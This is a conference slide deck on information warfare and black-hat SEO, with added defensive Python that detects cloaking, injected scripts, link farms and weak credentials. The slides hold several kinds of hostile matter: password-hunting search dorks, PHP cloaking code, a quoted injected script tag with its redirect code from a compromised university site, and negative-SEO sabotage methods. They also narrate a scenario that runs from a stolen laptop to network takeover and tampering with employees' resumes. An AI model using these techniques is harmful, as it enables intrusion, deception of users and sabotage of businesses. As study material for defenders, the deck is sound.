Small treatise about e-manipulation for honest people
[Slide 1] Small treatise about e-manipulation for honest people
Information based attacks on the Internet

Frédéric Raynal, Sogeti / Cap Gemini, MISC magazine
fred(at)security-labs.org, frederic.raynal(at)sogeti.com

François Gaspard, New Zealand Telecom International
fg(at)tnzi.com, kad(at)miscmag.com

[Slide 2] Storybook: attacking with no limit

Information warfare is often restricted to information as content.
Hacking is often restricted to a technical exploit.
What if we merge both? => Attack with both the content and the container:
- Information based operations: deception, intoxication, misinformation, ...
- Technical operation: Search Engine Optimization as a means to emphasize the information we want

[Slide 3] Roadmap
1. Information based attacks
2. Search engine optimization
3. Once upon a time...

[Slide 4] (Short and inaccurate) summary of information warfare

Two kinds of orientation:
- Information management in order to achieve information dominance
  - Use information to produce knowledge
  - Others have to run after you to keep up to date
- Information used as a weapon
  - Dominance is one goal, not the only one
  - Think also of deception, intoxication or misinformation, ...
[Slide 5] Information based attacks (IBA)

[Diagram: a cycle Collect -> Recruit -> Arm -> Propagate]
- Collect: human sources, newspapers, the Internet
- Recruit: consumers, researchers, journalists
- Arm: articles, interviews, books
- Propagate: newspapers, leaflets, web sites

[Slide 6] Roadmap
1. Information based attacks: Collect, Recruit, Arm, Propagate
2. Search engine optimization
3. Once upon a time...

[Slide 7] Collect: where to gather information on the Internet

- Google, MSN, Yahoo, ... only see 10% of the web!
  Ex.: social network websites (LinkedIn, Orkut, Twitter, Facebook, ...)
- Use the appropriate tool depending on the information you are looking for
  Ex.: Federal Funding Accountability and Transparency Act (FFATA) for contracts with the US government
- The perimeter of a network has gone from known to blurred
- The perimeter of information is out of control...

[Slide 8] Google Hacking: fun and profits

Finding passwords
- inurl:passwd.txt (1st result on google.com: WebAdmin:aeYYajmW204V6)
Owned websites
- intitle:"hacked by": imaginative pictures...
- intitle:tt2.swi: compromised websites installing a Java trojan
Entertainment
- intitle:"Live View / - AXIS" | inurl:view/view.shtml: some surveillance cams
- site:free.fr intitle:"index of" mp3: p2p outdated
[Slide 10] Recruit: populate the attackers

- Infiltrate where they already are
  - Stay hidden as much as possible: Tor, open proxies, open WiFi, ...
- Create your own contestation
  - Opposition website: federate all opponents in one place

[Slide 11] Opposition website: jeboycotteDanone.com
[Screenshot]

[Slide 13] Arm: the battlefield == the Internet

There is life outside the Internet
- Consequences of, and answers to, our actions can be led outside the Internet
- Combining it with other battlefields is more efficient: lawsuits, finance, information in newspapers or leaflets, ...

Internet howto
- Websites are spread all over the Internet => add websites under your control
- A human looks for information => spread information on the Internet, push it to the user
- The results are found according to search engines => change the results by tricking the search engines

[Slide 14] Usual attacks: using information to attack

- Intoxication: an attempt to misguide the interpretation and reasoning of the target, that is, its analysis capacities
  Ex.: spreading wrong information, the "false/false" strategy
  Ex.: changing the content of a website according to who visits
- Deception: based either on hiding (e.g. camouflage, blinding) or on simulation (create, lure, invent)
  Ex.: WW2, when false military bases were created in order to mislead the Germans about the D-Day location
  Ex.: abusing search engines to warp the results
- Misinformation: based on alteration, removal, addition, and so on, of information
  Ex.: the supposed lethal benzene in Perrier bottles
  Ex.: hoaxes, rumors spreading from one forum to another, then by mail, and so on

[Slide 16] Propagate: organize knowledge to export the battle

- Increase the doubts toward the target in the public
- Increase the bad conscience of the target itself

Questions and answers: what if you can increase the perception of all our vectors and, at the same time, decrease the perception of the target's answers?
=> This is where SEO comes into play...
[Slide 18] Definitions

Web spam: the practice of manipulating web pages in order to cause search engines to rank some web pages higher than they would without any manipulation.

Search engine optimization (SEO) [?]: SEO is the process of improving the volume and quality of traffic to a web site from search engines via "natural" ("organic" or "algorithmic") search results for targeted keywords.

[Slide 19] Why/how would I do SEO?

Motives
- Users trust search engines as a means of finding information => exploit this trust
- Users usually do not look past the first ten results returned by the search engine => exploit this laziness

A matter of color
- White hat SEO: a site conforms to the search engines' guidelines and involves no deception
- Black hat SEO: attempts to improve rankings in ways that are disapproved of by the search engines, or that involve deception

[Slide 20] Roadmap
1. Information based attacks
2. Search engine optimization: White Hat SEO, Black Hat SEO, Advanced examples, Aggressive Black Hat SEO
3. Once upon a time...

[Slide 21] A quick overview of White Hat SEO

Usual guidelines
- Keywords: be creative, avoid generic keywords
- Architecture: page rank is computed according to incoming and outgoing links
- Content: needs to be innovative and refreshed regularly
=> Guidelines are not written as a series of rules

Strategy: long term, no deception
- Create content for users, not for search engines
- Make that content easily accessible to the spiders
=> The content indexed by the SE is the same as the one seen by users

[Slide 23] A quick overview of Black Hat SEO: spamming the web for profit

The online pharmacy industry [?]
- Many industries prefer not to spam directly (due to anti-spam laws in the US and Europe)
- They create an affiliate program
  => Sales increase: regular income thanks to affiliates
  => Limited liability: the affiliate is used as a scapegoat

How do some affiliate programs allow spam?
- No terms of agreement on the sign-up page
- Some companies operate in jurisdictions where spam is not illegal (ex. Seychelles)
- Spam is "restricted" to email spam

[Slide 24] Black Hat SEO is a myth... or not [?]
[Screenshot]

[Slide 25] A quick overview of Black Hat SEO

Strategy: short term, deception
- The content indexed by the SE is often different from the one seen by users
- Most techniques are nasty, some are illegal

A few basic examples
- Content spam: altering the view a SE has of a page
  Invisible text, keyword stuffing, doorway pages, scraper sites, ...
- Link spam: taking advantage of link-based ranking algorithms
  Link farms, hidden links, sybil attacks, spam blogs, page hijacking, ...
- World-writable spam: adding links to sites editable by users
  Blog entries, forums, wikis, referrer spamming, ...

[Slide 28] Cloaking

Goal: modify the content of the page according to the request parameters

Cloaking for dummies
- User agent cloaking: change the page depending on who comes

    // PHP: serve a different page to a crawler identified by its User-Agent
    if (strpos($_SERVER["HTTP_USER_AGENT"], "Googlebot") !== false) {
        include("googlebot-special.html");
    } else {
        // display real page
    }

- IP cloaking: change the page depending on where the request comes from

    // PHP: the client address is the selector instead of the User-Agent
    $ip = strval($_SERVER["REMOTE_ADDR"]);

[Slide 29] A(n in)famous example: spider view of bmw.de
[Screenshot]

[Slide 30] A(n in)famous example: human view of bmw.de
[Screenshot]

[Slide 31] Solving captchas

Goal: automatic registration on forums, posting comments on blogs, ...

Captcha for dummies [?]
- Remove the background: denoising
- Join the points in the letters: filtering
- Derotate the letters: geometric transformation
- Read the letters: pattern recognition

[Slide 32] Solving captchas: phpBB2 [?]
[Screenshot]

[Slide 33] Real case: who wants certified viagra (1/3)
[Screenshot of the search results]
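The cloaking slides above rely on the spider and the browser seeing different content, and the real case that follows rests on a script include injected into a trusted site. A site owner can check for both by fetching a page twice (once with a crawler User-Agent, once with a browser one) and comparing what came back. The check below is an added example, not code from the slides: it compares the visible text of two views and lists external `<script src>` hosts that are not on an allowlist. The two HTML views, the allowlist and the `.invalid` hostnames are constructed; fetching the views is left to whatever HTTP client you use.

```python
"""Site-owner check for cloaking and injected script includes: compare the
text a crawler is served with the text a browser is served, and list
<script src> hosts that are not on an allowlist.  Added example, not code
from the slides; the two HTML views and the allowlist are constructed."""
import difflib
from html.parser import HTMLParser
from urllib.parse import urlparse


class PageScan(HTMLParser):
    """Collect visible text lines and <script src> values from one HTML view."""

    def __init__(self):
        super().__init__()
        self.lines = []
        self.script_srcs = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._in_script = True
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.script_srcs.append(value)

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        text = " ".join(data.split())          # collapse whitespace
        if text and not self._in_script:       # script bodies are not visible text
            self.lines.append(text)


def scan(html):
    parser = PageScan()
    parser.feed(html)
    parser.close()
    return parser


def unexpected_script_hosts(html, allowed_hosts):
    """Hosts of external <script src> includes that are not on the allowlist.
    Relative src values have no host and are treated as first-party."""
    hosts = set()
    for src in scan(html).script_srcs:
        host = urlparse(src).hostname
        if host and host.lower() not in allowed_hosts:
            hosts.add(host.lower())
    return sorted(hosts)


def cloaking_report(bot_html, human_html, allowed_hosts):
    """Similarity of the visible text of the two views (1.0 = identical), the
    lines that only one view contains, and off-allowlist script hosts per view."""
    bot_lines = scan(bot_html).lines
    human_lines = scan(human_html).lines
    ratio = difflib.SequenceMatcher(None, bot_lines, human_lines).ratio()
    return {
        "similarity": ratio,
        "only_in_bot_view": [l for l in bot_lines if l not in human_lines],
        "only_in_human_view": [l for l in human_lines if l not in bot_lines],
        "unexpected_scripts_bot": unexpected_script_hosts(bot_html, allowed_hosts),
        "unexpected_scripts_human": unexpected_script_hosts(human_html, allowed_hosts),
    }


# Constructed sample: two views of the same URL on a fictional site.
ALLOWED_HOSTS = {"www.acme-consulting.invalid"}

BOT_VIEW = """<html><head><title>ACME Consulting</title></head><body>
<h1>ACME Consulting</h1>
<p>IT consulting, cheap IT consulting, best IT consulting, offshore IT consulting.</p>
<p>IT consulting Paris, IT consulting Lyon, IT consulting Lille, IT consulting Nantes.</p>
<script src="/static/site.js"></script>
</body></html>"""

HUMAN_VIEW = """<html><head><title>ACME Consulting</title></head><body>
<h1>ACME Consulting</h1>
<p>We help companies run their IT projects.</p>
<script src="/static/site.js"></script>
<script src="http://static.unknown-cdn.invalid/x.js"></script>
</body></html>"""

if __name__ == "__main__":
    for key, value in cloaking_report(BOT_VIEW, HUMAN_VIEW, ALLOWED_HOSTS).items():
        print(key, "->", value)
```

A similarity well below 1.0 between the two views of a page that should not be personalised is the signal to look at; the keyword-stuffed lines show up under `only_in_bot_view`, and the off-allowlist script host is what an injected include like the one in the university case would look like in the browser view. Run the comparison from two different source addresses as well, since the IP-cloaking variant keys on `REMOTE_ADDR` rather than the User-Agent.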
[Slide 35] Real case: certified viagra at university (2/3)

http://spirit.dos.uci.edu/interfaith/?page=254
- The user clicks on the 2nd answer, trusting the .edu
- PR: 6/10, backlinks: 3420
- The site runs Nucleus CMS v3.23 (current: 3.32)
- A flaw in the default skin allows injecting code into the generated pages:

    <script src="http://focusa.net/gcoxiio.js"></script>

- gcoxiio.js redirects depending on the referer:
  Referer: www.google.fr/search?q=certified+viagra&ie=utf-8
  Redirection:

    // JavaScript: only visitors arriving from a search for the keyword are redirected
    if (document.referrer.toLowerCase().indexOf('viagra') != -1)
        location.href = 'http://pillsonline.biz/viagra.htm';

- The user is redirected to http://pillsonline.biz/viagra.htm

[Slide 36] Real case: pills online (3/3)
[Screenshot]

[Slide 38] Black Hat SEO reversed

Goal: decrease the page rank of competitors' websites

Some nasty but legal ideas...
- Inject poison keywords into the target's website: sex, drug, medicine, viagra, casino, ...
- Google bowling: add links to the target from many bad sites; even better with blacklisted websites!
- Google washing: use an old domain you own to duplicate the content of the target's website, then report the target as duplicate content => the SE will ban the newest
- And many more!!!

[Slide 40] Situation

Players
- Proctor: a French IT consulting company; limited resources, driven by cost killing
- Tonton: an Indian IT consulting company; many men at work, cheaper than European ones

Comments
- Goal: Tonton wants to enter the European market
- Vector: buy a well-known local company, Proctor
- Means: exhaust Proctor's resources so that it needs help
- Limit: do not deteriorate Proctor's image too much

[Slide 41] Roadmap
1. Information based attacks
2. Search engine optimization
3. Once upon a time...: The main strategy, White ops based on SEO, Black ops based on hacking
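Slide 21 states that page rank is computed from incoming and outgoing links, slide 25 lists link farms as link spam, and the "Black Hat SEO reversed" slide above builds on the same mechanism. To make the mechanism concrete, here is an added example, not code from the slides or from any search engine: a textbook PageRank iteration on a small constructed link graph, a heuristic that flags a closed cluster of pages whose only outlinks go to a target and to each other (the shape a link farm has), and a measure of how much of the target's link-derived rank that cluster supplies. The graph, the page names and the `proctor` target are constructed; real engines use many more signals than this.

```python
"""PageRank on a small constructed link graph, plus a heuristic that flags
a link-farm-like cluster of inbound linkers.  Added example, not from the
slides; the graph below is constructed."""


def pagerank(graph, damping=0.85, iterations=100):
    """Iterative PageRank. graph maps a page to the list of pages it links to.
    Pages with no outlinks (dangling) spread their rank evenly over all pages."""
    nodes = sorted(set(graph) | {t for targets in graph.values() for t in targets})
    n = len(nodes)
    rank = {v: 1.0 / n for v in nodes}
    for _ in range(iterations):
        new = {v: (1.0 - damping) / n for v in nodes}   # teleport term
        for v in nodes:
            outs = graph.get(v, [])
            if outs:
                share = damping * rank[v] / len(outs)
                for u in outs:
                    new[u] += share
            else:
                share = damping * rank[v] / n
                for u in nodes:
                    new[u] += share
        rank = new
    return rank


def inbound_contributions(graph, rank, target, damping=0.85):
    """Rank flowing into target through explicit links, per linking page."""
    return {v: damping * rank[v] / len(outs)
            for v, outs in graph.items() if target in outs}


def closed_linker_cluster(graph, target):
    """Inbound linkers of target whose every outlink goes to target or to
    another inbound linker of target: a self-contained cluster that exists
    only to pass rank, which is what a link farm looks like in the graph."""
    linkers = {v for v, outs in graph.items() if target in outs}
    return sorted(v for v in linkers if set(graph[v]) <= linkers | {target})


def link_rank_share(graph, rank, target, sources, damping=0.85):
    """Fraction of target's link-derived rank (teleport excluded) that comes
    from the given sources."""
    contrib = inbound_contributions(graph, rank, target, damping)
    total = sum(contrib.values())
    if total == 0:
        return 0.0
    return sum(contrib[s] for s in sources if s in contrib) / total


def without_nodes(graph, removed):
    """Copy of graph with the given pages and every link to them removed."""
    removed = set(removed)
    return {v: [u for u in outs if u not in removed]
            for v, outs in graph.items() if v not in removed}


# Constructed graph: a small organic web (news -> blog -> forum -> news, news
# also links to proctor) plus four farm pages that link to proctor and to
# each other and to nothing else.
FARM = ["farm1", "farm2", "farm3", "farm4"]
WEB = {
    "news": ["blog", "proctor"],
    "blog": ["forum"],
    "forum": ["news"],
    "proctor": [],
}
for f in FARM:
    WEB[f] = ["proctor"] + [g for g in FARM if g != f]

if __name__ == "__main__":
    rank = pagerank(WEB)
    for page, r in sorted(rank.items(), key=lambda kv: -kv[1]):
        print(f"{page:8s} {r:.4f}")
    cluster = closed_linker_cluster(WEB, "proctor")
    print("closed cluster linking to proctor:", cluster)
    print("share of proctor's link rank from that cluster:",
          round(link_rank_share(WEB, rank, "proctor", cluster), 3))
```

With the farm present `proctor` is the top-ranked page and roughly 60% of its link-derived rank comes from the four farm pages; remove them with `without_nodes(WEB, FARM)` and `news` is the top page again. The closed-cluster heuristic is deliberately crude (a pair of legitimate partner sites that link only to each other and to you would match it too), so treat it as a triage signal for a backlink audit rather than a verdict.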
[Slide 42] Buying Proctor: the main strategy

Marry me
- Tonton proposes a partnership to Proctor:
  - A big (and lucrative) contract in India, where Proctor wants to grow
  - Proctor must propose other contracts in Europe to Tonton, where Proctor wants to find partners
- The 1st Indian contract is really interesting for Proctor
- Tonton then gives other (rotten) contracts to Proctor on the Indian markets

Results
- Proctor: resources consumed in several markets, new businesses, lawsuits
- Tonton: internal view of Proctor, cheaper resources involved

[Slide 43] Buying Proctor: the main strategy (diagram)
[Diagram. Legend: T: Tonton (Indian company), P: Proctor (European company), PR: Public Relations.
India: Tonton & Proctor negotiate; T&P answer (and win) a 1st big contract; contract for P; contract for P: lots of work, small benefits; contract for T: lawsuits]

[Slide 44] Buying Proctor: drug the salesmen of Proctor

Happiness or deception for the groom
- Provide a nice clients list to several salesmen => they consume energy trying to reach them
- Invitations to tender: identify them and give them to Proctor => they consume energy trying to win them
- Hire away salesmen: show them life is better somewhere else => cause internal tensions and resignations

Results
- Proctor: the salesmen will be busier than they have ever been, the goal being to saturate them
- Tonton: learn the European market through the watcher, wait for exhaustion

[Slide 45] Buying Proctor: drug the salesmen (diagram)
[Diagram extending slide 43. Paris: T + PR; exhibitions; T puts watchers on the .fr markets; visitors lists; clients list given to salesmen; many invitations to tender; hire away salesmen]

[Slide 47] Buying Proctor: life-in-IT-consulting.org

Time for opposition
- Currently there is no website on life and business in IT consulting => create one, promote it
- Use contacts found during information gathering to provide input
- Contact a PR agency to promote the articles (propose interesting and new content!!!)
- Use white hat SEO to enforce the visibility
- Never target Proctor directly
=> We have created a very efficient long-term influence tool

[Slide 48] Buying Proctor: life-in-IT-consulting.org (diagram)
[Diagram extending slide 45. www.Life-in-itconsulting.org, promoted by SEO; fed by workers, former workers and clients; PR => press: "bad" content, salary study]

[Slide 50] Buying Proctor: aggressive SEO to shut up Proctor

The sound of silence
- Google bowling: create many backlinks to Proctor from "bad" websites (racist, sex, drugs, online casino, ...)
  - Create "bad" websites with the same keywords as Proctor
  - Use blacklisted websites to link to Proctor
- Duplicate content: find or create duplicate content on Proctor's website
  - Use blogs, forums, ..., to have many links pointing to the same page:
    http://proctor.com/blogs?lang=fr
    http://proctor.com/blogs?lang=en
- Link farm: automatically create many websites dealing with Proctor and having many many many links to Proctor

[Slide 51] Buying Proctor: aggressive SEO to shut up Proctor (diagram)
[Diagram extending slide 48. Against proctor.com: link farms, SEO, Google washing, Google bowling, flaw exploitation]

[Slide 53] Buying Proctor: owning the local network

One stolen laptop is the key to everything...
[Diagram of the internal network with the credentials recovered from it (most passwords masked as ******** on the slide):
- Printing server: jdupont: ********; Administrator: (empty)
- DB server: sqlserver / sa; admprov: *******; admsql: ******; srvadm: srv0dm
- 2 domain controllers: 1289 accounts, 8 admins: Administrator, jrichard, jdupont, jkevin, dvador, samva, cveso, obade (all ********)
- File and printing servers
- Standard workstation: locadm: ********; locuser: qwerty
- Backup server + master: sv_deploy: d3pl0y75; Administrator: $admin$
- Project server: rv: rv; Administrator: *******
- Several other servers (Lotus Notes, mail, ...)
Annotations on the diagram: empty password, weak password, known password, and the same password reused across machines (jdupont, admprov, locadm, rv)]

[Slide 54] Buying Proctor: owning the local network (diagram)
[Diagram extending slide 51. LAN: steal laptop, own AD, own www, own SMTP; poison keywords, cloaking noise]

[Slide 55] Buying Proctor: when human (resources) is the weak link

Hiring away people
- Focus on identified key people and send them (better) job proposals
- Use the access to the LAN to get the resumes of all engineers and spread them on the Internet: some competitors will know what to do with them

Hiring process: hunting ghosts
- People tracking resumes on the Internet search the same few sites: make access to these sites difficult
- Either on the proxy or on the (shared) storage, change what looks like an email address or phone number in the resumes: people will be much harder to reach
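What turns one stolen laptop into the whole network on the "owning the local network" slide is the credential hygiene the diagram annotates: an empty Administrator password, passwords equal to the account name, dictionary words, and one password reused on several machines. The audit below is an added example, not code from the slides: it runs those four checks over a list of (host, account, password-hash) records without ever needing the cleartext of a real password, by hashing the candidates (empty string, the account name, a short common-word list) and comparing digests, and by grouping identical digests to find reuse across hosts. The records and the `SHA-256` stand-in for whatever hash the directory actually stores are constructed.

```python
"""Credential hygiene audit over (host, account, digest) records: empty
password, password equal to account name, common password, and the same
password reused across hosts.  Added example, not from the slides; the
records and the use of SHA-256 as a stand-in hash are constructed."""
import hashlib
from collections import defaultdict


def digest(password):
    """Stand-in for the directory's password hash (constructed: SHA-256)."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


COMMON_WORDS = ["qwerty", "password", "123456", "admin", "$admin$"]


def audit_credentials(records, common_words=COMMON_WORDS):
    """records: iterable of (host, account, digest).
    Returns a sorted list of (host, account, finding) tuples."""
    common = {digest(w): w for w in common_words}
    empty = digest("")
    findings = []
    owners_by_digest = defaultdict(set)

    for host, account, d in records:
        if d == empty:
            findings.append((host, account, "empty password"))
        elif d in (digest(account), digest(account.lower())):
            findings.append((host, account, "password equals account name"))
        elif d in common:
            findings.append((host, account, "common password: " + common[d]))
        owners_by_digest[d].add((host, account))

    # Reuse: one digest owned by accounts on more than one host.  Empty
    # passwords are reported above and excluded here.
    for d, owners in owners_by_digest.items():
        hosts = {host for host, _ in owners}
        if d != empty and len(hosts) > 1:
            for host, account in owners:
                findings.append((host, account,
                                 "same password used on %d hosts" % len(hosts)))
    return sorted(findings)


# Constructed records modelled on the shape of the slide's diagram
# (fictional hosts, accounts and passwords).
RECORDS = [
    ("print-srv",   "Administrator", digest("")),
    ("print-srv",   "jdupont",       digest("Shared-Adm1n")),
    ("db-srv",      "admprov",       digest("Shared-Adm1n")),
    ("db-srv",      "srvadm",        digest("Summer2008!x")),
    ("workstation", "locuser",       digest("qwerty")),
    ("project-srv", "rv",            digest("rv")),
    ("backup-srv",  "Administrator", digest("$admin$")),
    ("dc1",         "Administrator", digest("Correct-Horse-9!")),
]

if __name__ == "__main__":
    for host, account, finding in audit_credentials(RECORDS):
        print(f"{host:12s} {account:14s} {finding}")
```

The reuse check is the one that matters most for the scenario on the slide: a local admin password shared between the print server and the database server means compromising the weaker of the two yields both. Comparing digests rather than cleartext lets the audit run against a dump of password hashes, which is what a domain audit normally has to work with.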
[Slide 56] Buying Proctor: when human (resources) is the weak link (diagram)
[Diagram extending slide 54. HR: steal key people, recruitment process, leak CVs, send them to recruitment offices, hire away, fake resumes, warp resumes, sites maintenance; articles inform the recruitment process]

[Slide 57] Conclusion: mixing everything in a clever way

- Attacking with information is complex but difficult to oppose
  - The attacker has the initiative, a real advantage
  - Quite easy (with time but no means) to amplify the attack
- SEO is a mix of following guidelines, cleverness and hacking
  - Usually applied to our own website (thus to information)
  - Can also be applied by anyone to anybody's website
=> Mixing both is really efficient
- The Internet is really well suited to propagating information (e.g. deception, misinformation, intoxication)
- Content (information) is emphasized thanks to the container (SEO)
- Do not forget you can also combine with other tricks from other fields
[Slide 58] Q & (hopefully) A

[Slide 59] References
- Search engine optimization: http://en.wikipedia.org/wiki/Search_engine_optimization
- Captcha Breaking W/ PHPBB2 Example: http://www.bluehatseo.com/user-contributed-captcha-breaking-w-phpbb2-examp
- Page Hijack: The 302 Exploit, Redirects and Google: http://clsc.net/research/google-302-page-hijack.htm
- Web spam techniques, R. S. Liverani: http://malerisch.net/docs/web_spam_techniques/web_spam_techniques.html